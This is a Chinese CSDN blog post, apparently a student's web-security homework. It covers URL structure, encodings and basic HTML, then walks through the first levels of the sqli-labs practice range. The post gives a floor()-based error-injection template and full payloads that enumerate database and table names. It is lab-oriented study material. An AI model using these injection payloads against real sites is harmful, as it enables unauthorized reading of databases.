网安第一次作业

最新推荐文章于 2024-07-20 18:16:53 发布
最新推荐文章于 2024-07-20 18:16:53 发布
阅读量2.3k 收藏
点赞数
文章标签: 前端 web安全 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52074845/article/details/121572784
版权

web入侵和渗透

官网 cnvd

漏洞类型
通用型漏洞
事件型漏洞

26中漏洞
登录成功的数字4624 审核成功
审核失败4625

url

用的协议为https
主机:域名或者ip
端口默认为80
路径 访问的路径
查询参数:类似于mysql中的查询 select

编码历史:
ascll
unicode(不可变)
utf-8(可变长)掌握utf-8的编码转码规则
先选择范围,然后根据规则将其补全

HTML超文本标记语言
构成 Web 世界的一砖一瓦。它定义了网页内容的含义和结构。除 HTML 以外的其它技术则通常用来描述一个网页的表现与展示效果(如 CSS),或功能与行为(如 JavaScript)。

HTML实例解析
这个 <p 元素定义了 HTML 文档中的一个段落。
这个元素拥有一个开始标签 p> 以及一个结束标签 /p

body 元素定义了 HTML 文档的主体。
这个元素拥有一个开始标签 body 以及一个结束标签 /body。

HTML 链接由 a标签定义

class 为html元素定义一个或多个类名(classname)(类名从样式文件引入)

id 定义元素的唯一id

h1 定义最大的标题。 h6 定义最小的标题

<b 定义粗体文本
<em 定义着重文字
<i 定义斜体字
<small 定义小号字
<strong 定义加重语气
<sub 定义下标字
<sup 定义上标字
<ins 定义插入字
<del 定义删除字

不过多介绍了

正则表达式(https://www.runoob.com/regexp/regexp-tutorial.html)

练习sql-map-master的1-7关

第一关
在这里插入图片描述
用id=1 and 1=1 判断是什么类型
在这里插入图片描述
发现第一关的闭合是与单引号有关。

第二关同理(只是与双引号有关)
在这里插入图片描述

第三关(与‘)有关)
在这里插入图片描述
第四关(与“)有关)在这里插入图片描述
第五关,和前面一样判断,发现他不为所动
在这里插入图片描述
但是通过 语句 我们发现正常闭合且显示正确,说明是单引号的注入漏洞
在这里插入图片描述

我们通过输入order by 等语句还是能看到明显的回显

因为没有数据显示 那么我们就不能用联合查询进行报错

所以我们这里采用报错注入

报错注入

报错注入的方法有多种 我们这里采用 floor报错

格式如下:

and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)

再者其中 payload就是你要搜索的语句
而对于本题 我们输入的内容如下:

?id=1’ and (select 1 from (select count(*),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

这里通过limit值 我们可以一条 一条的搜索 数据库的名称

在这里插入图片描述

同理 我们可以通过相同的方法来进行数据库表的查询

输入如下:

?id=1’ and (select 1 from (select count(*),concat((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=“ctftraining” limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

其余同理即可

yq517168丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
javaWeb过滤器
babyFF9的博客
04-08 310
Fileter介绍  Filter也称之为过滤器,它是Servlet技术中最实用的技术,WEB开发人员通过Filter技术,对web服务器管理的所有web资源:例如Jsp, Servlet, 静态图片文件或静态 html 文件等进行拦截,从而实现一些特殊的功能。例如实现URL级别的权限访问控制、过滤敏感词汇、压缩响应信息等一些高级功能  Servlet API中提供了一个Filter接口,开发...
Java Web模拟题
m0_62698297的博客
11-09 1066
假设userService对象有方法listAll()返回用户列表List,用户信息:ID(id)、姓名(name)、密码(passwd)。26、在JavaScript中,编写一个用户(User)类,属性有名字(name)、年龄(age),方法有show( ),在方法中使用alert弹出用户的名字和年龄。25、在JavaScript中,对数组[6, 3, 1, 5, 2, 4]按数值进行从大到小排序,并将结果以分号相隔拼成一个字符串,并使用alert弹出该字符串。
Java Web过滤器
weixin_30596023的博客
02-08 162
1.过滤器的概念 过滤器一个服务器端的组件,它可以拦截客户端的求和响应信息,并对这些信息进行过滤。 注意:1. javaWeb三大组件:Filter、Servlet、Listener    2. Filter 程序可以拦截 Jsp, Servlet, 静态图片文件和静态 html 文件。 Servlet API中提供了一个Filter接口,如果编写额类实现了这个接口,则称这个类为过滤器...
Filter 过滤器
小草莓的博客
12-28 476
Filter 过滤器1、什么是过滤器2、Filter 的初体验3、Filter 的生命周期4、FilterConfig 类5、FilterChain 过滤器链6、Filter拦截路6.1、精确匹配6.2、目录匹配6.3、后缀名匹配 1、什么是过滤器 Filter 过滤器它是 JavaWeb 的三大组件之一。三大组件分别是:Servlet 程序、Listener 监听器、Filter 过滤器 Filter 过滤器它是 JavaEE 的规范。也就是接口 Filter 过滤器它的作用是:拦截求,过滤响
JavaWeb第十二章课后题 过滤器Filter详解
qq_64314976的博客
01-12 1691
在DiskFileItemFactory类的方法中,用于设置临时文件的存放目录的是( )。9. 在Filter的配置信息中,不属于元素的可选值的是( )。2. 在FileItem接口的方法中,用于获取文件表单字段的文件名的是( )。10. 在Filter的配置信息中,用于映射将要拦截的URL的元素是( )。7. 下列接口中,用于调用过滤器链中下一个过滤器的是( )。12. 下列不属于Servlet过滤器的特点的是() [单选题] *
周玉川-2017221302006-网安技术第一次作业1
08-03
安全服务与安全机制之间存在多对多关系,一种服务可由多种机制实现,反之亦然。 在不同网络层次部署安全服务有其优缺点。应用层服务对数据理解深入,但改动较大且可能降低效率;网络层服务具有透明性,但难以实现...
周玉川-2017221302006-网安技术第七次作业1
08-08
周玉川同学的第七次作业主要探讨了入侵检测的分类、主要技术指标以及未知攻击检测方法,并提出了一个实践性的课后练习。 1. 入侵检测的分类: - 异常检测模型(Anomaly Detection):这种模型依赖于对正常行为的...
周玉川-2017221302006-网安技术第三次作业1
08-03
周玉川-2017221302006-网安技术第三次作业1
周玉川-2017221302006-网安技术第五次作业1
08-08
第四次作业测试点5-1主机扫描技术是利用ICMP协议来实现,查阅相关资料,了解ICMP协议的工作原理,并简要说明Ping功能的实现原理。由于IP协议本身缺少主
周玉川-2017221302006-网安技术第四次作业1
08-08
Biba 控制模型是一种信息流控制模型,旨在保护机密性和完整性。模型中,信息流是从高级别到低级别的。高级别的信息不能流向低级别的信息,以避免信息泄露和污染。模型中,信息流可以认为是从高级别的写到低级别的读...
mysql数据库权限
weixin_46831638的博客
01-07 731
即先检查全局权限表user,如果user中对应的权限为Y,则此用户对所有数据库的权限都为Y,将不再检查db, tables_priv,columns_priv;那么Mysql的权限是如何实现的呢?➢在 MySQL中,修改root用户密码的方式有多种: 一种是修MySQL数据库的user表,另-种是使用mysqladmin命令修改密码,还有一种是使用SET语句修改root用户密码。➢MySQL中的权限,根据其操作对象的不同,可以分为4个级别:全局性管理权限,数据库级别权限,数据库对象级别权限和列级别权限。
Spark Streaming(头歌)
m0_53510670的博客
06-21 3824
第1关:套接字流实现黑名单过滤 代码: importorg.apache.spark.SparkConf importorg.apache.spark.streaming.StreamingContext importorg.apache.spark.streaming.Seconds objectTransformBlackList{ defmain(args:Array[String]):Unit={ /**********Begin**********/ ...
MySQL用户权限(Host,User,Password)管理(mysql.user)
萝卜坑
11-11 941
1:新增用户: 注:mysql数据库下user表中,Host和User为两个主键列(primary key),已经各版本下非空未设置默认字段。 登录后,切换db: mysql> use mysql;Reading table information for completion of table and column namesYou can turn off this feature t...
SQL注入漏洞的攻击与防御
weixin_46273733的博客
08-13 952
一、实验名称 SQL注入漏洞的攻击与防御 二、实验环境(详细说明运行的系统、平台及代码等) 1、攻击机系统环境:Windows 7/8/10 2、浏览器:Firefox 53.0.2(64位) 3、浏览器插件HackBar 1.6.3.1 三、实验步骤及结果 1、过滤了特殊符号的字符型注入 实验网址: http://222.18.158.243:4603/ 注入点:http://222.18.158.243:4603/?id=1 Web应用考虑了对用户输入的id进行过...
【计算机网络】Web应用的安全问题——SQL注入原理及防御
戴陵FL的博客
10-03 1398
SQL注入原理及防御 文章目录SQL注入原理及防御一、SQL注入原理1.什么是SQL注入?2.SQL注入原理二、SQL注入的危害三、SQL注入的防御参数化查询 一、SQL注入原理 1.什么是SQL注入? 因为基本上每一个Web应用底层都需要使用数据库来保存所需的各种数据,与数据库交互的方式就是程序生成并向数据库提交一些SQL语句来完成数据的CRUD操作 那么一旦这些SQL语句被恶意篡改、被控制,攻击者在原有SQL语句上拼接上一些关键字,从而改变该SQL语句的愿意,从而使得SQL语句经数据库操作后变成攻击者
SocketServer通信服务端,加密通信,记录IP地址,黑名单,白名单,首次不发送消息就加入黑名单
IT_ziliang的博客
07-26 3725
什么是 socket? socket 的原意是“插座”,在计算机通信领域,socket 被翻译为“套接字”,它是计算机之间进行通信的一种约定或一种方式。通过 socket 这种约定,一台计算机可以接收其他计算机的数据,也可以向其他计算机发送数据。 我们把插头插到插座上就能从电网获得电力供应,同样,为了与远程计算机进行数据传输,需要连接到因特网,而 socket 就是用来连接到因特网的工具...
前端面试题日常练-day97 【Less】
最新发布
qq_44640575的博客
07-20 276
border-radius()函数用于在Less中生成圆形边框效果。通过设置border-radius()函数,我们可以为元素的边框添加圆角效果,使边框呈现圆形的外观,从而美化页面元素的边框样式。
TinyVue v3.17.0 正式发布,推出了一款基于 Quill 2.0 的富文本编辑器,功能强大、开箱即用!
OpenTiny的博客
07-17 1032
本文由体验技术团队Kagol老师原创~我们非常高兴地宣布,2024年6月26日,TinyVue 发布了 v3.17.0 🎉。TinyVue 每次大版本发布,都会给大家带来一些实用的新特性,上一个版本我们重构了 chart-core,新增 CircleProcessChart 圆环进度图等6个新的图表组件,并增加了 Statistic 数据统计组件。表格图片超链接复制粘贴插入表情文件上传@提醒斜杆菜单v-auto-tip。
谷粒商城实战笔记-39-前端基础-Vue-指令-v-on、v-for、v-if
epitomizelu的专栏
07-20 498
v-on 是 Vue.js 中的一个指令,用于在 DOM 元素上监听用户事件,并在事件触发时执行相应的 JavaScript 函数。它提供了一种将 Vue 实例中的方法与 DOM 事件关联起来的方式,使得你可以轻松地对用户交互做出响应。v-on 指令的基本语法是在元素上添加 v-on:event-name=“method”,其中 event-name 是你要监听的 DOM 事件类型(如 click、mouseover、keydown 等),method 则是 Vue 实例中定义的方法名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值